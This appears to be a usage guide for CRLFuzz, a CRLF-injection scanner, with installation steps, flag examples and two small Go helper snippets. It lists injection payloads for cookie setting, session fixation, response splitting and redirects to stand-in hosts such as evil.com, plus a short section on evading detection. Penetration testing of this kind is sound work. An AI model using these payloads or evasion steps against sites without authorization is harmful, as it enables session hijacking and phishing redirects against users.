# CRLFuzz

## Overview

CRLFuzz is a lightweight, fast CRLF (Carriage Return Line Feed) injection vulnerability scanner written in Go. It efficiently detects CRLF injection vulnerabilities across web applications by testing parameters and headers against multiple payloads. The tool is ideal for bug bounty hunters and penetration testers conducting security assessments on web applications.
## Installation

### Prerequisites

- Go 1.11+ (for building from source)
- Or download precompiled binaries

### From Source

```sh
git clone https://github.com/dwisiswant0/crlfuzz.git
cd crlfuzz
go build -o crlfuzz
```

### macOS/Linux (Binary)

```sh
wget https://github.com/dwisiswant0/crlfuzz/releases/download/v1.5.0/crlfuzz_1.5.0_linux_amd64.tar.gz
tar -xvf crlfuzz_1.5.0_linux_amd64.tar.gz
chmod +x crlfuzz
```

### Homebrew (macOS)

```sh
brew install dwisiswant0/tap/crlfuzz
```

### Windows

Download the .exe from the releases page: https://github.com/dwisiswant0/crlfuzz/releases
## Basic Usage

| Command | Description |
|---|---|
| crlfuzz -u <url> | Scan single URL |
| crlfuzz -l <file> | Scan URLs from file |
| crlfuzz -u <url> -v | Verbose output |
| crlfuzz --help | Show help menu |
| crlfuzz -u <url> -c 10 | Set concurrency level |
## Single URL Scanning

### Basic Scan

```sh
crlfuzz -u 'http://example.com/?page=test'
```

### With Verbose Output

```sh
crlfuzz -u 'http://example.com/?page=test' -v
```

### Show Request/Response Details

```sh
crlfuzz -u 'http://example.com/?name=value' -v --show-req --show-resp
```
## Batch Scanning

### Scan Multiple URLs from File

```sh
crlfuzz -l urls.txt
```

Create urls.txt:

```
http://example.com/?page=test
http://example.com/?user=admin
http://example.com/?id=123
```

### Scan All URLs with Verbose Mode

```sh
crlfuzz -l urls.txt -v
```

### Output Results to File

```sh
crlfuzz -l urls.txt -o results.txt
```
## Concurrency and Performance

### Adjust Concurrency Level

```sh
crlfuzz -l urls.txt -c 25
```

The default is 10 concurrent requests. Increase it for larger scans.

### Maximum Concurrency

```sh
crlfuzz -l urls.txt -c 100
```

Use cautiously to avoid overwhelming target servers.

### Timeout Configuration

```sh
crlfuzz -u 'http://example.com/?test=value' -t 30
```

Sets the timeout in seconds (the default is 10 seconds).
## Payload Configuration

### Default Payloads

CRLFuzz includes built-in CRLF injection payloads:

- `%0d%0a` (URL-encoded CRLF)
- `%0d` (CR only)
- `%0a` (LF only)
- `\r\n` (Raw CRLF)

### Custom Payload File

```sh
crlfuzz -u 'http://example.com/?page=test' -payloads custom-payloads.txt
```

Create custom-payloads.txt:

```
%0d%0a
%0d%0aSet-Cookie:admin=true
%0d%0aLocation:http://evil.com
%0d%0aX-Injected:value
```

### Test Specific Injection Points

```sh
crlfuzz -u 'http://example.com/?param=VALUE' -payloads payloads.txt
```

CRLFuzz replaces VALUE with each payload.
## Header Testing

### Test Custom Headers

```sh
crlfuzz -u 'http://example.com/' -H 'X-Forwarded-For: test' -v
```

### Multiple Custom Headers

```sh
crlfuzz -u 'http://example.com/' -H 'User-Agent: test' -H 'X-Custom: value'
```

### Test All Headers

```sh
crlfuzz -u 'http://example.com/?page=test' --test-headers
```
## Parameter Fuzzing

### Scan All Parameters

```sh
crlfuzz -u 'http://example.com/?page=test&user=admin&id=123'
```

Automatically tests all parameters for CRLF injection.

### Focus on Specific Parameter

```sh
crlfuzz -u 'http://example.com/?page=test' -param 'page'
```

### Exclude Parameters from Testing

```sh
crlfuzz -u 'http://example.com/?page=test&id=123' -skip 'id'
```
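To make the substitution behaviour concrete (the VALUE marker from "Test Specific Injection Points" and the fuzz-every-parameter default from "Scan All Parameters"), here is an added Go example, not CRLFuzz's own code, that builds the candidate URLs for a given query string. It assumes payloads are supplied already URL-encoded, so they are spliced into the raw query rather than re-encoded (which would turn `%0d%0a` into `%250d%250a` and defeat the test).

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Payloads in the style of the built-in list, already URL-encoded.
var payloads = []string{"%0d%0a", "%0d", "%0a", "%0d%0aX-Injected:value"}

// FuzzURLs returns one candidate URL per (parameter, payload) pair.
// If any parameter carries the marker VALUE, only those parameters are
// fuzzed; otherwise every parameter is fuzzed in turn while the others
// keep their original value. Hypothetical helper, not a CRLFuzz API.
func FuzzURLs(raw string, payloads []string) ([]string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return nil, err
	}
	if u.RawQuery == "" {
		return nil, fmt.Errorf("no query parameters in %q", raw)
	}
	pairs := strings.Split(u.RawQuery, "&")
	marker := false
	for _, p := range pairs {
		if strings.HasSuffix(p, "=VALUE") {
			marker = true
		}
	}
	var out []string
	for i, p := range pairs {
		key, val, _ := strings.Cut(p, "=")
		if marker && val != "VALUE" {
			continue
		}
		for _, pl := range payloads {
			q := make([]string, len(pairs))
			copy(q, pairs)
			q[i] = key + "=" + pl // raw splice: the encoded CR/LF is kept verbatim
			v := *u
			v.RawQuery = strings.Join(q, "&")
			out = append(out, v.String())
		}
	}
	return out, nil
}

func main() {
	urls, _ := FuzzURLs("http://example.com/?page=test&user=admin", payloads)
	for _, u := range urls {
		fmt.Println(u)
	}
}
```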
## Output Formats

### Default Text Output

```sh
crlfuzz -u 'http://example.com/?test=value'
```

The output shows:

- URL
- Vulnerable parameter
- Payload used
- Response status code

### JSON Output

```sh
crlfuzz -l urls.txt -o results.json -json
```

### CSV Export

```sh
crlfuzz -l urls.txt -o results.csv -csv
```

### Suppress Output

```sh
crlfuzz -l urls.txt -q
```

Quiet mode: only results are shown.
## Proxy Configuration

### HTTP Proxy

```sh
crlfuzz -u 'http://example.com/?test=value' -proxy http://127.0.0.1:8080
```

### SOCKS5 Proxy

```sh
crlfuzz -u 'http://example.com/?test=value' -socks5 127.0.0.1:1080
```

### Proxy with Authentication

```sh
crlfuzz -u 'http://example.com/?test=value' -proxy http://user:pass@127.0.0.1:8080
```
## SSL/TLS Options

### Ignore SSL Certificate Errors

```sh
crlfuzz -u 'https://example.com/?test=value' --insecure
```

### Use Custom CA Certificate

```sh
crlfuzz -u 'https://example.com/?test=value' --ca-cert /path/to/ca.crt
```
## HTTP Methods and Request Customization

### Test POST Parameters

```sh
crlfuzz -u 'http://example.com/' -method POST -data 'param=VALUE&user=test'
```

### PUT Request

```sh
crlfuzz -u 'http://example.com/api/resource' -method PUT -data 'field=VALUE'
```

### Custom Request Body

```sh
crlfuzz -u 'http://example.com/api' -method POST -data '{"key":"VALUE"}'
```

### Add Request Headers

```sh
crlfuzz -u 'http://example.com/?test=VALUE' -H 'Authorization: Bearer token' -H 'Content-Type: application/json'
```
## Response Analysis

### Show Response Headers

```sh
crlfuzz -u 'http://example.com/?test=value' -v --show-resp
```

### Show Response Body

```sh
crlfuzz -u 'http://example.com/?test=value' -v --show-body
```

### Filter by Status Code

```sh
crlfuzz -l urls.txt --filter-status 200
```

Only tests URLs that return status 200.
## Advanced Filtering

### Match Success by Response Content

```sh
crlfuzz -u 'http://example.com/?test=value' -match 'Set-Cookie'
```

The vulnerability is considered confirmed if the response contains "Set-Cookie".

### Filter Responses Containing Text

```sh
crlfuzz -l urls.txt -match 'Location:' -o vulnerable.txt
```
## Rate Limiting

### Request Delay (Milliseconds)

```sh
crlfuzz -l urls.txt -delay 100
```

Adds a 100 ms delay between requests.

### Requests Per Second

```sh
crlfuzz -l urls.txt -rate 10
```

Limits the scan to 10 requests per second.
## Common Workflows

### Quick Vulnerability Scan

```sh
crlfuzz -u 'http://example.com/?page=home&user=test'
```

### Comprehensive Bug Bounty Scan

```sh
crlfuzz -l target-urls.txt -v --show-req --show-resp -o findings.txt
```

### Stealth Scanning

```sh
crlfuzz -l urls.txt -delay 500 -c 5 --insecure
```

### Large-Scale Assessment

```sh
crlfuzz -l thousands-of-urls.txt -c 50 -t 30 -json -o results.json
```
## CRLF Injection Attack Vectors

### Header Injection Attack

- Payload: `%0d%0aSet-Cookie:admin=true`
- Result: Response header contains the injected Set-Cookie

### Response Splitting

- Payload: `%0d%0a%0d%0aHTTP/1.1 200 OK`
- Result: Ability to split the HTTP response

### Session Fixation

- Payload: `%0d%0aSet-Cookie:SESSIONID=attacker-controlled`
- Result: Forces the victim's session ID

### Open Redirect via Headers

- Payload: `%0d%0aLocation:http://evil.com`
- Result: Redirects the user to a malicious site

### Cache Poisoning

- Payload: `%0d%0aX-Original-URL:/cache-buster`
- Result: Poisons cached responses
## Understanding CRLFuzz Output

### Example Output

```
[CRLF] http://example.com/?page=VALUE
[PARAMETER] page
[PAYLOAD] %0d%0aSet-Cookie:admin=true
[STATUS] 200
[FOUND] Yes
```

### Vulnerability Indicators

- Status code change after injection
- Additional headers in the response
- Response splitting evidence
- Cookie manipulation detection
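The indicators above are differences between the response to a clean request and the response to the payload request. As an added example (not CRLFuzz's own detection code), the Go function below parses two raw HTTP responses and reports those differences: a changed status code, header names that appear only after injection, and a Set-Cookie that the baseline did not carry. The two responses are constructed inline for illustration and were not captured from any real host.

```go
package main

import (
	"bufio"
	"net/http"
	"sort"
	"strings"
)

// Indicators mirrors the signals a reviewer checks when confirming a finding.
type Indicators struct {
	StatusChanged bool     // status code differs after injection
	NewHeaders    []string // header names present only in the injected response
	CookieSet     bool     // injected response sets more cookies than baseline
}

func parseResponse(raw string) (*http.Response, error) {
	return http.ReadResponse(bufio.NewReader(strings.NewReader(raw)), nil)
}

// Compare parses the baseline and payload responses and returns which
// indicators differ. Hypothetical helper name, not a CRLFuzz API.
func Compare(baseline, injected string) (Indicators, error) {
	var ind Indicators
	b, err := parseResponse(baseline)
	if err != nil {
		return ind, err
	}
	i, err := parseResponse(injected)
	if err != nil {
		return ind, err
	}
	ind.StatusChanged = b.StatusCode != i.StatusCode
	for name := range i.Header { // names are canonicalised by the parser
		if _, ok := b.Header[name]; !ok {
			ind.NewHeaders = append(ind.NewHeaders, name)
		}
	}
	sort.Strings(ind.NewHeaders)
	ind.CookieSet = len(i.Cookies()) > len(b.Cookies())
	return ind, nil
}

// Constructed sample responses: the second is what a server that echoes the
// page parameter into Location would return for %0d%0aSet-Cookie:admin=true.
const baselineResp = "HTTP/1.1 302 Found\r\nLocation: /?page=test\r\nContent-Length: 0\r\n\r\n"
const injectedResp = "HTTP/1.1 302 Found\r\nLocation: /?page=\r\nSet-Cookie:admin=true\r\nContent-Length: 0\r\n\r\n"
```

Running `Compare(baselineResp, injectedResp)` reports no status change, `Set-Cookie` as the only new header, and a cookie set, which is the header-injection case from the attack vectors above.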
## Detection Evasion

### Randomize User-Agent

```sh
crlfuzz -u 'http://example.com/?test=value' -H 'User-Agent: Mozilla/5.0 (random)'
```

### Vary Request Patterns

```sh
crlfuzz -l urls.txt -delay 500 -c 3
```

### Rotate Through Payloads

```sh
crlfuzz -u 'http://example.com/?test=value' -payloads rotating-payloads.txt
```
## Troubleshooting

### Connection Timeout

```sh
crlfuzz -u 'http://slow-server.com/?test=value' -t 60
```

Increases the timeout to 60 seconds.

### Too Many Errors

```sh
crlfuzz -l urls.txt -c 5 -t 30
```

Reduces concurrency and increases the timeout.

### SSL Certificate Issues

```sh
crlfuzz -u 'https://example.com/?test=value' --insecure
```

Bypasses SSL verification.

### Not Finding Vulnerabilities

```sh
crlfuzz -u 'http://example.com/?test=value' -payloads extended-payloads.txt -v
```

Try custom payloads together with verbose mode.
## Best Practices

- Obtain authorization before scanning production systems
- Start with low concurrency and increase gradually
- Use appropriate timeouts for slow servers
- Test parameters individually for precise results
- Review all findings carefully for false positives
- Combine with other scanners for comprehensive testing
- Keep the tool updated for the latest payload detection
## Payload Examples

### Basic CRLF

```
%0d%0a
```

### Header Injection

```
%0d%0aX-Injected-Header:value
```

### Cookie Injection

```
%0d%0aSet-Cookie:name=value
```

### Location Redirect

```
%0d%0aLocation:http://attacker.com
```
## Integration with Other Tools

### Pipe URLs from httpx

```sh
httpx -l domains.txt | crlfuzz -
```

### With Wayback Machine URLs

```sh
waybackurls example.com | crlfuzz -
```

### Combine with Parameter Fuzzer

```sh
ffuf -w params.txt -u 'http://example.com/?FUZZ=test' | crlfuzz -
```
## Performance Tips

- Increase concurrency for large URL lists
- Use shorter timeouts for quick scans
- Test parameters in separate scans if needed
- Monitor CPU and network usage
- Use filtering to reduce false positives
## Legal Considerations

CRLFuzz is for authorized security testing only. Always obtain explicit written permission before testing any system. Unauthorized access and scanning are illegal.
## Resources

- GitHub: https://github.com/dwisiswant0/crlfuzz
- CRLF Injection Guide: https://owasp.org/
- Bug Bounty Resources: https://hackerone.com/
- Community: Active GitHub discussions and issues